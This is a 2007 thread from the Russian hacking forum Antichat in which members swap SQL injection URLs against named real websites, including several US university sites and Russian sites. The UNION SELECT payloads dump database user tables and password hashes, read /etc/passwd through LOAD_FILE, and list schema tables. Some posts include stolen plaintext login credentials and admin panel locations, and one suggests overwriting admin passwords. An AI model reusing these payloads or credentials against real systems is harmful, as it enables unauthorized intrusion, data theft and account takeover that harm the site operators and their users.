Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.03.2007, 18:03
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме: 865816
Репутация:
181
|
|
http://www.agenciapulsar.org/coberturas_det.php?id=-1+union+select+1,version(),user(),4,5,6,7,8/*
|
|
|

09.03.2007, 18:21
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
пошел значит я почитать про выборы в Питере...
Код:
http://www.vybor-spb.ru/area.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x78),0x78),3,4+from+mysql.user/*
вот как у нас хорошо готовятся)
|
|
|

09.03.2007, 19:07
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме: 2693408
Репутация:
861
|
|
-вырезано-
ошибочка 
|
|
|

09.03.2007, 19:09
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме: 9098076
Репутация:
4303
|
|
решил слить всё что у меня накопилось =D ужос..
начнём с ЭДУ
http://www.eng.wayne.edu/news.php?id=-99+union+select+1,convert(version()+using+latin1), 3,4,5,6,7,8,9,0,1,2,3/*
http://biomedical.rutgers.edu/faculty.php?id=-20+union+select+1,2,3,4,5,6,7,8,9,concat(login,cha r(58),password),11,12,13,14,15,16,17,18,19,20+from +users
admin:tm9537!# - вход в админку справа. Ничё интересного я там не нашёл
http://chaplains.harvard.edu/chaplains/profile.php?id=-1+union+select+1,2,3,4,LOAD_FILE(0x2f6574632f70617 3737764),6,7,8,9,10,11/*
поддомен Гарварда. Находится к сожалению на другом серваке
http://moritzlaw.osu.edu/faculty/bios.php?ID=-99+union+select+1,2,3,password,username,6,7,8,9,10 ,11,12,13,14,15,16,17+from+access
так и не нашёл как попасть в админку. Хотя искал не очень внимательно... =)
http://www.cpd.usu.edu/division.php?id=-99+union+select+1,2,3,4,5,6,table_name,8,9,10+from +information_schema.tables+limit+16,1/*
хз чё там. Сервак на винде
http://www.linfield.edu/humanresources/detail.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*
http://experts.uchicago.edu/experts.php?id=459+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,concat(user,char(58),password),14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42+from+mysql.user/*
http://www.hcs.harvard.edu/~hib/viewannounce.php?ID=-1+union+select+1,2,version(),4,5/*
опять поддомен гарварда и опять другой сервер
http://www.mcli.dist.maricopa.edu/ocotillo/retreat05/demos.php?id=-17+union+select+1,2,3,4,5,6,7,LOAD_FILE('/tmp/preved.php'),9,10,11,12,13,14,15,16,17
Превед
http://www.bu.edu/phpbin/news/releases/display.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,convert(version()+using+latin1)/*
http://www.housing.wisc.edu/resnet/news/story.php?id=-10+union+select+1,2,3,4,5,concat(user,char(58),pas sword),7,8,9,10+from+mysql.user
http://slim.climaxdesigns.com/tutorial.php?section=slim&id=-1+union+select+1,2,null,4,concat(user,char(58),pas sword)+from+users+limit+0,1/*
http://www.cageprisoners.com/page.php?id=-3+union+select+1,2,concat(username,char(58),passwo rd)+from+admins+limit+0,1
http://www.mp3collection.ru/links/cats.php?id=-16+union+select+1,2,3,4,5,6,7,8,concat(name,char(5 8),password),null,11,12,13,14,15,16+from+users+lim it+0,5000/*
без лимита страничка наглухо виснет и негрузится
http://www.labnow.com/product_updates.php?id=-13+union+select+1,concat(user,char(58),password),3 ,4,5,6,7,8,9,10,11,12,13+from+users+limit+0,1
http://www.grivelnorthamerica.com/ambassadors.php?id=-5+union+select+1,user,3,pass,5+from+users
http://www.gooom.com/artists.php?id=-13+union+select+1,mail,3,4,5,6,7,8,9,10,11,12,13+f rom+users
http://www.redbarngarden.com/index.php?id=-3+union+select+concat(username,char(58),passwd,cha r(58),auth),2,3+from+cms_auth
как сказал Грей пароль в SHA-1
http://www.dysgenicrecords.com/artist.php?id=-17+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17
http://www.globelines.com.ph/DataServiceHomeUse.php?id=-10+union+select+1,2,3,4,convert(version()+using+la tin1),6,7,8,9,10
ууух. Ну вот это пока что всё =) ещё где то была скуля в зоне GOV но я потерял =)
|
|
|

09.03.2007, 20:01
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме: 865816
Репутация:
181
|
|
PHP код:
http://alx.ultranet.ru/joke_show.php?id=-1+union+select+1,version(),user()/*
PHP код:
http://www.tklenta.ru/articles_txt.php?id=-1+union+select+user(),version()/*
Последний раз редактировалось Colkru; 09.03.2007 в 20:06..
|
|
|

09.03.2007, 20:06
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме: 3536885
Репутация:
447
|
|
вот от меня скуля
Код:
http://lib.prometey.org/?lib=forum&t=-92+union+select+1,concat(user_login,char(58),user_pass,char(58),user_mail)+FROM+user+limit+10353,1/*
не плохо 10353 юзеров и все пассы в чистом виде
login: bob
pass: mixail26
сама админка http://lib.prometey.org/admin.php
|
|
|

09.03.2007, 20:35
|
|
Участник форума
Регистрация: 13.01.2007
Сообщений: 160
Провел на форуме: 865816
Репутация:
181
|
|
PHP код:
http://www.intercar.com.ua/index.php?id=-1+union+select+1,2,version(),user(),5,6+from+users/*
PHP код:
http://www.viking.tm/product.php?id=-1+union+select+1,2,3,4,5,6,7/*
PHP код:
http://chugworth.com/comic.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/*
Последний раз редактировалось Colkru; 09.03.2007 в 20:46..
|
|
|

09.03.2007, 21:11
|
|
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме: 3405508
Репутация:
1745
|
|
PHP код:
www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8'
|
|
|

09.03.2007, 21:29
|
|
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме: 2924346
Репутация:
1719
|
|
Сообщение от KPOT_f!nd
PHP код:
www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=8'
можно кста вот так:
Код:
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,12+from+mysql.user+limit+0,1/*
&&
Код:
http://www.auditorium.ru/p/index.php?a=presdir&c=getForm&r=discDesc&discipline_id=-1'+union+select+1,2,3,LOAD_FILE(0x2f6574632f706173737764),5,6,7,8,9,10,11,12+from+mysql.user/*
Последний раз редактировалось n1†R0x; 09.03.2007 в 23:40..
|
|
|

09.03.2007, 22:03
|
|
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме: 9254548
Репутация:
1942
|
|
http://www.vrijwilligerswerk.be/informatie/informatie.php?id=2+order+by+99
UPDATE
т е можно сделать +union+update+admins+set+password='preved'
http://www.soaw.org/new/sub.php?id=2+order+by+99
http://pride.uoregon.edu/section.php?id=-6+unioN+select+1,2,3,4,5,6
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|